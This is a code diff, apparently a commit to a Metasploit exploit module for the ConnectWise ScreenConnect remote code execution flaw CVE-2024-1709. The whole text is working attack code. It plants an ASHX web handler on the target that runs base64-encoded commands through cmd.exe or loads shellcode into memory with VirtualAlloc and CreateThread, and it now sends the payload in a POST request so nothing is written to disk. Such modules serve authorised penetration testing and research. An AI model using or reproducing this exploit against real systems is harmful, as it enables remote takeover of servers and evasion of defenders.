POST the payload.encoded data when we trigger the ASHX file, this way we dont drop the Metasploit payload to disk.

modules/exploits/windows/http/connectwise_screenconnect_rce_cve_2024_1709.rb

@@ -207,7 +207,6 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     if target['Arch'] == ARCH_CMD
-
       payload_data = %(<% @ WebHandler Language="C#" Class="#{vars[:var_handler_class]}" %>
 using System;
 using System.Web;
@@ -215,13 +214,21 @@ using System.Diagnostics;
 
 public class #{vars[:var_handler_class]} : IHttpHandler
 {
-  public void ProcessRequest(HttpContext ctx)
+  public void ProcessRequest(HttpContext #{vars[:var_ctx]})
   {
+    if (String.IsNullOrEmpty(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"])) {
+      return;
+    }
+
+    byte[] #{vars[:var_bytearray]} = Convert.FromBase64String(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"]);
+
+    string #{vars[:var_payload]} = System.Text.Encoding.UTF8.GetString(#{vars[:var_bytearray]});
+
     ProcessStartInfo #{vars[:var_psi]} = new ProcessStartInfo();
 
     #{vars[:var_psi]}.FileName = "cmd.exe";
 
-    #{vars[:var_psi]}.Arguments = "/c #{payload.encoded.gsub('\\', '\\\\\\\\')}";
+    #{vars[:var_psi]}.Arguments = "/c " + #{vars[:var_payload]};
 
     #{vars[:var_psi]}.RedirectStandardOutput = true;
 
@@ -233,8 +240,6 @@ public class #{vars[:var_handler_class]} : IHttpHandler
   public bool IsReusable { get { return true; } }
 })
     else
-      var_payload = Rex::Text.numhexify(payload.encoded, Rex::Text::DefaultWrap, '', '', '', '', ',')
-
       payload_data = %(<% @ WebHandler Language="C#" Class="#{vars[:var_handler_class]}" %>
 using System;
 using System.Web;
@@ -249,9 +254,13 @@ public class #{vars[:var_handler_class]} : IHttpHandler
   [System.Runtime.InteropServices.DllImport("kernel32")]
   private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, UIntPtr dwStackSize, IntPtr lpStartAddress, IntPtr param, Int32 dwCreationFlags, ref IntPtr lpThreadId);
 
-  public void ProcessRequest(HttpContext ctx)
+  public void ProcessRequest(HttpContext #{vars[:var_ctx]})
   {
-    byte[] #{vars[:var_bytearray]} = { #{var_payload} };
+    if (String.IsNullOrEmpty(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"])) {
+      return;
+    }
+
+    byte[] #{vars[:var_bytearray]} = Convert.FromBase64String(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"]);
 
     IntPtr #{vars[:var_func_addr]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{vars[:var_bytearray]}.Length, 0x3000, (IntPtr)0x40);
 
@@ -305,12 +314,20 @@ public class #{vars[:var_handler_class]} : IHttpHandler
       #
       # 7. Trigger the payload by requesting the extensions .ashx file.
       #
-      res = send_request_cgi(
-        'method' => 'GET',
-        'uri' => normalize_uri(target_uri.path, 'App_Extensions', plugin_guid, payload_ashx),
-        'keep_cookies' => true
-      )
+      if target['Arch'] == ARCH_CMD
+        payload_data = payload.encoded.gsub('\\', '\\\\\\\\')
+      else
+        payload_data = payload.encoded
+      end
 
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'App_Extensions', plugin_guid, payload_ashx),
+        'keep_cookies' => true,
+        'vars_post' => {
+          vars[:var_payload_key] => Base64.strict_encode64(payload_data)
+        }
+      )
       unless res&.code == 200
         fail_with(Failure::UnexpectedReply, 'Unexpected reply after attempt to trigger payload.')
       end